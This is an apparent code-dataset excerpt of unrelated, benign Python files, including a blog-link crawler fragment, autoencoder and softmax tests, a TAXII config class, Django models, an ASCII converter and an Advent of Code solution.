                if r:
                    if friends and index_rhtml:
                        # Both pieces found for this site; stop scanning.
                        break
                    elif r.status_code == 200 and urlparse(r.url).netloc == urlparse(url).netloc:
                        if not friends:
                            # Keep only root-level external links, excluding
                            # blacklisted domains and the site itself.
                            pass_domain = PASS_DOMAIN + \
                                [urlparse(r.url).netloc]
                            friends = list(
                                map(lambda url: rm_slash(url), r.html.absolute_links))
                            friends = list(filter(lambda url: all([url.find(
                                pdomain) == -1 for pdomain in pass_domain]) & (urlparse(url).path == ""), set(friends)))
                        if not index_rhtml and rm_slash(r.url) == url:
                            index_rhtml = r
                    else:
                        pass
            if friends and index_rhtml:
                res.append((url, friends, index_rhtml))
    except Exception as e:
        print(e)
    finally:
        return res
if __name__ == "__main__":
    # Sample sites for manual runs of get_data().
    urls = ["https://www.magicican.com",
            "https://elfgzp.cn",
            "https://ruterly.com",
            "https://www.tsuna.moe"]
    # Hand-built feature vector to sanity-check the classifier.
    data = {
        "has_archive": 0,
        "has_tag": 1,
        "has_category": 0,
        "has_about": 1,
        "has_theme": 1,
        "has_zh_text": 1,
        "has_blog_text": 1,
        "has_generator": 1,
        "has_rss": 1,
        "len_friends": 1
        # "tld": "com",
        # "sld": "1a23"
    }
    print(test(data))
    # get_data(urls)
|
987,190 | 2d246bff36484239bc035b33d997bef115cdde4a | # -*- coding: utf-8 -*-
import numpy as np
from breze.learn import autoencoder
from breze.learn.utils import theano_floatx
def test_autoencoder():
    """Smoke-test a tied-weight single-layer autoencoder: fit, score, transform."""
    data = np.random.random((10, 10))
    data, = theano_floatx(data)
    model = autoencoder.AutoEncoder(
        10, [100], ['tanh'], 'identity', 'squared',
        tied_weights=True, max_iter=10)
    model.fit(data)
    model.score(data)
    model.transform(data)
def test_deepautoencoder():
    """Smoke-test a three-hidden-layer (untied) autoencoder end to end."""
    data = np.random.random((10, 10))
    data, = theano_floatx(data)
    model = autoencoder.AutoEncoder(
        10, [100, 10, 100], ['tanh', 'identity', 'tanh'],
        'identity', 'squared',
        tied_weights=False, max_iter=10)
    model.fit(data)
    model.score(data)
    model.transform(data)
def test_sparse_autoencoder():
    """Smoke-test the sparse autoencoder with a KL sparsity penalty."""
    data = np.random.random((10, 10))
    data, = theano_floatx(data)
    model = autoencoder.SparseAutoEncoder(
        10, [100], ['sigmoid'], 'identity', 'squared', tied_weights=True,
        optimizer='rprop',
        sparsity_target=0.01, c_sparsity=3., sparsity_loss='bern_bern_kl',
        max_iter=10)
    model.fit(data)
    model.score(data)
    model.transform(data)
def test_contractive_autoencoder():
    """Smoke-test the contractive autoencoder (Jacobian penalty)."""
    data = np.random.random((10, 10))
    data, = theano_floatx(data)
    model = autoencoder.ContractiveAutoEncoder(
        10, [100], ['sigmoid'], 'identity', 'squared', tied_weights=True,
        c_jacobian=3, max_iter=10)
    model.fit(data)
    model.score(data)
    model.transform(data)
def test_denoising_autoencoder():
    """Smoke-test the denoising autoencoder with Gaussian input noise."""
    data = np.random.random((10, 10))
    data, = theano_floatx(data)
    model = autoencoder.DenoisingAutoEncoder(
        10, [100], ['sigmoid'], 'identity', 'squared', tied_weights=True,
        noise_type='gauss', c_noise=.3, max_iter=10)
    model.fit(data)
    model.score(data)
    model.transform(data)
|
987,191 | 07b398dc7c3aebd738d3cb8ca28390c1c2d0cbaa | # coding: utf-8
# Copyright © 2014-2020 VMware, Inc. All Rights Reserved.
################################################################################
# noinspection PyUnresolvedReferences
import os
import re
from enum import Enum
from taxii2client.common import TokenAuth
from taxii2client.v20 import Server as ServerV20
from taxii2client.v21 import Server as ServerV21
from cbopensource.utilities.common_config import BoolConfigOption, CertConfigOption, CommaDelimitedListConfigOption, \
CommonConfigBase, CommonConfigException, CommonConfigOptionBase, IntConfigOption, PairedConfigOption, \
StringConfigOption
__all__ = ["TaxiiURLConfigOption", "ServerVersion", "ServerVersionConfigOption",
"TaxiiServerConfiguration"]
class TaxiiURLConfigOption(CommonConfigOptionBase):
    """Config option validating the TAXII server 'url' setting."""
    @staticmethod
    def taxii_url_checker(value):
        # NOTE(review): the pattern is unanchored and only requires
        # 'http(s)://<non-space>' to appear somewhere in the value; the port
        # group is unreachable because \S+ already consumes it, and the
        # '/taxii2' suffix promised by the error message is never checked.
        # Confirm intended strictness before tightening.
        matched = re.search(r"https?://\S+(:\d{1,5})?", value)
        if matched is None:
            raise CommonConfigException(f"Server url must match required format http(s)://<server>[:port]/taxii2")
    def __init__(self):
        super().__init__('url', str, bounds_checker=self.taxii_url_checker)
class ServerVersion(Enum):
    """Supported TAXII protocol versions, mapped to taxii2client Server classes."""
    V21 = 1
    V20 = 0
    @staticmethod
    def get_server_for_version(version):
        """Return the taxii2client Server class for *version*."""
        return ServerV20 if version == ServerVersion.V20 else ServerV21
    @staticmethod
    def from_string(str_version):
        """Parse a case-insensitive version string ('v20'/'v21') into a member."""
        return ServerVersion[str_version.upper()]
    @staticmethod
    def check_string_version(str_version):
        """Raise CommonConfigException unless the string names a supported version."""
        if str_version.upper() not in ("V20", "V21"):
            raise CommonConfigException(f"Version '{str_version.upper()}' "
                                        f"not supported, supported versions are V21 and V20")
class ServerVersionConfigOption(CommonConfigOptionBase):
    """Optional 'version' setting: validated as 'V20'/'V21' (case-insensitive)
    and transformed into a ServerVersion member."""
    def __init__(self):
        super().__init__('version', str, bounds_checker=ServerVersion.check_string_version, required=False,
                         transform=ServerVersion.from_string, allowed_values=[ServerVersion.V20, ServerVersion.V21])
class TaxiiServerConfiguration(CommonConfigBase):
    """
    The class handles the configuration of a single TAXII connection stanza.
    """
    DEFAULT_SCORE = 75
    DEFAULT_PAGINATION = 100
    PAGINATION_LOW_BOUNDS = 10
    PAGINATION_HIGH_BOUNDS = 1000
    # Schema definitions
    config_schema = {
        "cert": CertConfigOption(),
        "collections": CommaDelimitedListConfigOption('collections', unique=True, required=False, default=None,
                                                      sort_list=False),
        "ioc_types": CommaDelimitedListConfigOption('ioc_types', unique=True, required=False, default=None,
                                                    accepted_values=['hash', 'address', 'domain'], max_len=3),
        # Fixed: the pagination default now uses the DEFAULT_PAGINATION
        # constant instead of a duplicated literal 100, so the two can't drift.
        "pagination": IntConfigOption('pagination', min_value=PAGINATION_LOW_BOUNDS, max_value=PAGINATION_HIGH_BOUNDS,
                                      required=False, default=DEFAULT_PAGINATION),
        # username and password are paired: each requires the other.
        "password": PairedConfigOption(StringConfigOption('password', required=False), 'username'),
        "score": IntConfigOption('score', min_value=1, max_value=100, default=DEFAULT_SCORE),
        "token": StringConfigOption("token", required=False, max_len=156, transform=TokenAuth),
        "url": TaxiiURLConfigOption(),
        "user": PairedConfigOption(StringConfigOption('username', required=False), 'password'),
        "verify": BoolConfigOption('verify', required=False, default=None),
        "version": ServerVersionConfigOption(),
    }
|
987,192 | 16b401849607d7694a277e3d461e28001675c37c |
from collections import Counter
def almost_uniform(nums):
    """Length of the largest multiset drawn from nums whose values span
    exactly two consecutive integers {v-1, v}; 0 if no such pair exists."""
    freq = Counter(nums)
    best = 0
    for value, count in freq.items():
        if value - 1 in freq:
            best = max(best, count + freq[value - 1])
    return best
|
987,193 | 176e684e1e4515a00a1a8f88ca7d5f37d2c5b6b7 | import glob
import os
import typing
import importlib.util
import models.cards
import models.decks
import models.players
# Card and deck definition files live under these subdirectories (searched
# relative to this module's directory).
RESOURCES_DIR = 'resources'
CARDS_DIR = f'{RESOURCES_DIR}/cards'
DECKS_DIR = f'{RESOURCES_DIR}/decks'
def get_card(card_id: str, player_number: models.players.PlayerNumber) -> models.cards.BaseCard:
    """Load the card module named <card_id>.py and assign it to *player_number*."""
    card: models.cards.BaseCard = _get_resource(card_id, CARDS_DIR, models.cards.BaseCard)
    card.player = player_number
    return card
def get_master_deck(deck_id: str) -> models.decks.MasterDeck:
    """Load the deck module named <deck_id>.py from the decks directory."""
    master_deck = _get_resource(deck_id, DECKS_DIR, models.decks.MasterDeck)
    return master_deck
ResourceType = typing.TypeVar('ResourceType')
def _get_resource(resource_id: str, base_dir: str, resource_type: typing.Type[ResourceType]) -> ResourceType:
    """Locate <resource_id>.py under *base_dir*, execute it as a module, and
    return its module-level ``resource`` attribute.

    Raises:
        FileNotFoundError: no matching file exists.
        FileExistsError: the id matches multiple files (ambiguous).
        ValueError: the file does not define a ``resource`` attribute.
    """
    _set_wd()
    file_names = glob.glob(f'{base_dir}/**/{resource_id}.py', recursive=True)
    if not file_names:
        raise FileNotFoundError(f'No file matching {resource_id}.py in {base_dir}')
    if len(file_names) > 1:
        raise FileExistsError(f'Multiple files matching {resource_id} in {base_dir}: {file_names}')
    file_name = file_names[0]
    spec = importlib.util.spec_from_file_location("module.name", file_name)
    resource_module = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(resource_module)
    try:
        return resource_module.resource
    except AttributeError:
        # Fixed: a missing module attribute raises AttributeError, not
        # ValueError, so the original handler (the author's own TODO) could
        # never fire and the raw AttributeError leaked to callers.
        raise ValueError(f'Resource file {file_name} does not create a resource attribute.') from None
def _set_wd():
    """Change the working directory to this module's directory so that the
    relative resource paths resolve regardless of the caller's cwd."""
    os.chdir(os.path.dirname(os.path.abspath(__file__)))
|
987,194 | a0be253ece64834eb814019324ecb84e12993ab4 | from django.db import models
from django.contrib import admin
class MenuList(models.Model):
    """A single purchasable item on the menu."""
    menu_item = models.CharField('Menu Item', max_length = 30)
    price = models.FloatField()
    available = models.BooleanField(default=False)
    def __unicode__(self):
        # NOTE(review): __unicode__ is only honoured on Python 2 / old Django;
        # under Python 3 this model shows the default repr — confirm target.
        return self.menu_item
class Order(models.Model):
    """A customer order for one menu item, with optional delivery details."""
    order_item = models.ForeignKey('MenuList', null=False)
    quantity = models.IntegerField(default=1)
    paid_for = models.BooleanField('Paid for')
    delivery = models.BooleanField('Do you want your food delivered to you? (50p)', default=False)
    delivery_cost = models.FloatField(default=.50)
    block = models.CharField('Block', blank=True, max_length = 30)
    # NOTE(review): room_num is blank=True but not null=True — an empty form
    # value cannot be stored for an IntegerField; confirm intended behaviour.
    room_num = models.IntegerField('Room number', blank=True)
    other_location = models.CharField('Other location', blank=True, max_length = 30)
    tel_num = models.IntegerField('Telephone', blank=True, null=True)
    order_details = models.TextField('Order details')
    created = models.DateTimeField('Date and time', auto_now_add=True)
    total_amount = models.FloatField(blank=True, null=True)
    def __unicode__(self):
        # Display as the ordered item's name (Python 2 / old Django only).
        return str(self.order_item)
# Expose both models in the Django admin.
admin.site.register(MenuList)
admin.site.register(Order)
|
987,195 | fdfdf23239241507857e5e210b92f00d657c826e | # Table of ASCII characters
# Table of ASCII characters: code -> printable name (control codes and
# space/DEL get their standard abbreviations, everything else is the char).
_CONTROL_NAMES = [
    "NUL", "SOH", "STX", "ETX", "EOT", "ENQ", "ACK", "BEL",
    "BS", "HT", "LF", "VT", "FF", "CR", "SO", "SI",
    "DLE", "DC1", "DC2", "DC3", "DC4", "NAK", "SYN", "ETB",
    "CAN", "EM", "SUB", "ESC", "FS", "GS", "RS", "US",
]
ascii_chars = {code: name for code, name in enumerate(_CONTROL_NAMES)}
ascii_chars[32] = "space"
ascii_chars.update({code: chr(code) for code in range(33, 127)})
ascii_chars[127] = "DEL"
# Inverse table: printable name -> ASCII code.
# Fixed: the original literal mapped "," to 4 instead of 44 (typo), so commas
# encoded to EOT's code. Building the table programmatically removes the
# whole class of transcription errors.
_CONTROL_CODES = [
    "NUL", "SOH", "STX", "ETX", "EOT", "ENQ", "ACK", "BEL",
    "BS", "HT", "LF", "VT", "FF", "CR", "SO", "SI",
    "DLE", "DC1", "DC2", "DC3", "DC4", "NAK", "SYN", "ETB",
    "CAN", "EM", "SUB", "ESC", "FS", "GS", "RS", "US",
]
text_ascii = {name: code for code, name in enumerate(_CONTROL_CODES)}
text_ascii["space"] = 32
text_ascii.update({chr(code): code for code in range(33, 127)})
text_ascii["DEL"] = 127
def ascii_converter(number):
    """Map an ASCII code (0-127) to its printable name or character.

    Raises KeyError for codes outside the table.
    """
    return ascii_chars[number]
def big_input(big):
    """Decode a whitespace-separated string of ASCII codes into text.

    Code 32 becomes ' '; codes outside the table are passed through as the
    literal number. Non-numeric tokens raise ValueError (unchanged behaviour).
    """
    tokens = str(big).split()
    new_text = ""
    for num in tokens:
        num = int(num)
        try:
            new = ascii_converter(num)
        except KeyError:
            # Fixed: only an unknown code should fall back to the literal
            # number; the original bare `except:` also hid unrelated errors.
            new = str(num)
        if new == "space":
            new_text += " "
        else:
            new_text += new
    return new_text
def text_to_ascii(t):
    """Encode text as space-terminated ASCII codes, e.g. 'ab' -> '97 98 '.

    Spaces are looked up under the 'space' key; unknown characters raise
    KeyError.
    """
    pieces = []
    for ch in str(t):
        lookup = "space" if ch == " " else ch
        pieces.append(str(text_ascii[lookup]) + " ")
    return "".join(pieces)
987,196 | 8c88dcbc5481a98d9519a183fe9c8cd02f1b0660 | #!/usr/bin/env python
# coding: utf-8
# In[ ]:
##
# Advent of code 2019, AoC day 16 puzzle 1
# This solution (python3.7 jupyter notebook) by kannix68, @ 2020-01-06.
import sys
sys.path.insert(0, '..') # allow import from parent dir
from typing import Dict, List, Tuple
import lib.aochelper as aoc
from lib.aochelper import map_e
# In[ ]:
import logging
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
log = logging.getLogger(__name__)
# In[ ]:
## PROBLEM DOMAIN code
import itertools
from timeit import default_timer as timer # performance timing measurement
# In[ ]:
def phase_transform(ins: str, ptrn: List[int], num_phases = 1) -> str:
    """Apply the AoC-2019 day-16 FFT phase transform *num_phases* times.

    For output digit i, the base pattern *ptrn* is stretched by repeating each
    element i+1 times, cycled over the input with the first element dropped
    (offset 1); the digit is abs(sum(input*pattern)) mod 10.
    """
    tmp = ins
    for iter in range(num_phases):
        if iter > 0:
            # Each phase after the first consumes the previous phase's output.
            tmp = outs
        outdigs = []
        for digidx in range(len(ins)):
            # Stretch the base pattern: each element repeated digidx+1 times.
            digptrn = []
            for i in ptrn:
                for fac in range(digidx+1):
                    digptrn.append(i)
            #log.debug(f"digid={digidx}, digptrn={digptrn}")
            outdig_compositor = []
            offset = 1 # number of elements to consume from (cycled) pattern before acting on input
            for idx, val in enumerate(itertools.cycle(digptrn), -offset):
                if idx == len(tmp):
                    break
                if idx < 0:
                    continue
                #log.debug(f"  {idx}, ins-dig={ins[idx]} ptrn:{val}")
                outdig_compositor.append( int(tmp[idx])*val )
            # Only the last (ones) digit of the absolute sum is kept.
            dig = abs(sum(outdig_compositor))%10
            outdigs.append(dig)
        outs = ''.join(map_e(str, outdigs))
        #log.debug(f"phase_transform #{iter+1}: outdigs={outs} via {len(ins)} iters from ptrn={aoc.cl(ptrn)}, input#={tmp}")
        log.info(f"phase_transform iter={iter+1} out={outs} via {len(ins)} iters from ptrn={aoc.cl(ptrn)}, input0={ins[:40]}...")
    return outs
# In[ ]:
## MAIN
# In[ ]:
### tests
# In[ ]:
## example 0-a from text
ins = "9, 8, 7, 6, 5"
ins = map_e(int, ins.split(', '))
ptrn = "1, 2, 3"
ptrn = map_e(int, ptrn.split(', '))
res = phase_transform(ins, ptrn)
log.info(f"result={res}")
#result = solve(ins)
#expected = 31
#aoc.assert_msg(f"input={ins} expects output={expected}, got {result}", expected == result)
# In[ ]:
## example 1: two manual phases, then four phases against the known answer.
ins = "12345678"
ptrn = [0, 1, 0, -1]
res = phase_transform(ins, ptrn)
log.info(f"result iter#1={res}")
res = phase_transform(res, ptrn)
# Fixed: this log line mislabelled the second iteration as iter#1.
log.info(f"result iter#2={res}")
result = phase_transform(ins, ptrn, num_phases=4)
expected = "01029498"
aoc.assert_msg(f"input={ins} expects output={expected}, got {result}", expected == result)
# In[ ]:
# example 2
ins = "80871224585914546619083218645595"
ptrn = [0, 1, 0, -1]
result = phase_transform(ins, ptrn, num_phases=100)
result = result[:8]
expected = "24176176"
aoc.assert_msg(f"input={ins} expects output={expected}, got {result}", expected == result)
# In[ ]:
# example 3
ins = "19617804207202209144916044189917"
ptrn = [0, 1, 0, -1]
result = phase_transform(ins, ptrn, num_phases=100)
result = result[:8]
expected = "73745418"
aoc.assert_msg(f"input={ins} expects output={expected}, got {result}", expected == result)
# In[ ]:
# example 4
ins = "69317163492948606335995924319873"
ptrn = [0, 1, 0, -1]
result = phase_transform(ins, ptrn, num_phases=100)
result = result[:8]
expected = "52432133"
aoc.assert_msg(f"input={ins} expects output={expected}, got {result}", expected == result)
# In[ ]:
### personal input solution
# In[ ]:
log.setLevel(logging.INFO)
data = aoc.read_file_to_str("day16.in").strip()
ptrn = [0, 1, 0, -1]
log.info(f"data-len={len(data)}, data={data[:40]}...")
tm_start = timer()
result = phase_transform(data, ptrn, num_phases=100)
tm_end = timer()
result = result[:8]
print(f"result={result} needed tm={tm_end-tm_start}")
|
987,197 | c5de715f77761720297f0fd8c470aa7cec92b2ce | """
Here we test things from the Nexa package
"""
import unittest
import numpy as np
import numpy.testing as nptest
from unittest import TestCase
import sys
sys.path.append('./')
import nexa.aux_functions as aux_functions
##################
# Test auxiliar functions
##################
class TestAuxiliaryFunctions(TestCase):
    """Unit tests for nexa.aux_functions.softmax_base."""
    def test_normalization(self):
        """The softmax output must always sum to one."""
        n_trials, lo, hi = 1000, -1000, 1000
        for _ in range(n_trials):
            sample = np.random.rand(100) * (hi - lo) + lo
            out = aux_functions.softmax_base(sample)
            nptest.assert_almost_equal(np.sum(out), 1.0)
    def test_finite(self):
        """The softmax output must contain no NaN/inf values, even for
        large-magnitude inputs."""
        n_trials, lo, hi = 1000, -1000, 1000
        for _ in range(n_trials):
            sample = np.random.rand(100) * (hi - lo) + lo
            out = aux_functions.softmax_base(sample)
            self.assertTrue(np.isfinite(out).all())
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
|
987,198 | 9f3b8103c1572d1f63552b5e8f519609416e144d | import unittest
from capstone.player import RandPlayer
class TestRandPlayer(unittest.TestCase):
    """Unit tests for the RandPlayer agent."""
    def setUp(self):
        self.rand_player = RandPlayer()
    def test_has_name(self):
        # The name is defined at class level, so it is visible both on the
        # class and on instances.
        self.assertEqual(RandPlayer.name, "RandPlayer")
        self.assertEqual(self.rand_player.name, "RandPlayer")
987,199 | a9ff2453871c7704f3ad743bf86e306157c786e9 |
# Strings (字符串): word, sentence, and multi-line paragraph examples.
word = '字符串'
sentence = "这是一个句子。"
paragraph = """这是一个段落,
可以由多行组成"""
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.